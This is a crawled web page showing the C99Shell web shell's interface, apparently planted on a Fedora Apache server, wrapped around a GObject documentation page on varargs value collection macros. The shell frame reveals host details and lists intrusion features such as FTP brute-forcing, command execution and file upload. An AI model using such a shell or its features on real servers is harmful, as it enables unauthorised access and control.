!C99Shell v. 1.0 pre-release build #16!

Software: Apache/2.0.54 (Fedora). PHP/5.0.4 

uname -a: Linux mina-info.me 2.6.17-1.2142_FC4smp #1 SMP Tue Jul 11 22:57:02 EDT 2006 i686 

uid=48(apache) gid=48(apache) groups=48(apache)
context=system_u:system_r:httpd_sys_script_t
 

Safe-mode: OFF (not secure)

/usr/share/gtk-doc/html/gobject/   drwxr-xr-x
Free 2.57 GB of 27.03 GB (9.51%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     gobject-Varargs-Value-Collection.html (7.85 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Varargs Value Collection

Varargs Value Collection

Varargs Value Collection — Converting varargs to generic values

Synopsis


#include <glib-object.h>
#include <gobject/gvaluecollector.h>


union       GTypeCValue;
#define     G_VALUE_COLLECT                 (value, var_args, flags, __error)
#define     G_VALUE_LCOPY                   (value, var_args, flags, __error)
#define     G_VALUE_COLLECT_FORMAT_MAX_LENGTH

Description

Details

union GTypeCValue

union GTypeCValue
{
  gint     v_int;
  glong    v_long;
  gint64   v_int64;
  gdouble  v_double;
  gpointer v_pointer;
};

A union holding one collected value.


G_VALUE_COLLECT()

#define     G_VALUE_COLLECT(value, var_args, flags, __error)

Collects a variable argument value from a va_list. We have to implement the varargs collection as a macro, because on some systems va_list variables cannot be passed by reference.

value : a GValue return location. value is supposed to be initialized according to the value type to be collected
var_args : the va_list variable; it may be evaluated multiple times
flags : flags which are passed on to the collect_value() function of the GTypeValueTable of value.
__error : a gchar** variable that will be modified to hold a g_new() allocated error messages if something fails

G_VALUE_LCOPY()

#define     G_VALUE_LCOPY(value, var_args, flags, __error)

Collects a value's variable argument locations from a va_list.

value : a GValue return location. value is supposed to be initialized according to the value type to be collected
var_args : the va_list variable; it may be evaluated multiple times
flags : flags which are passed on to the lcopy_value() function of the GTypeValueTable of value.
__error : a gchar** variable that will be modified to hold a g_new() allocated error messages if something fails

G_VALUE_COLLECT_FORMAT_MAX_LENGTH

#define	G_VALUE_COLLECT_FORMAT_MAX_LENGTH	(8)

The maximal number of GTypeCValues which can be collected for a single GValue.


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.003 ]--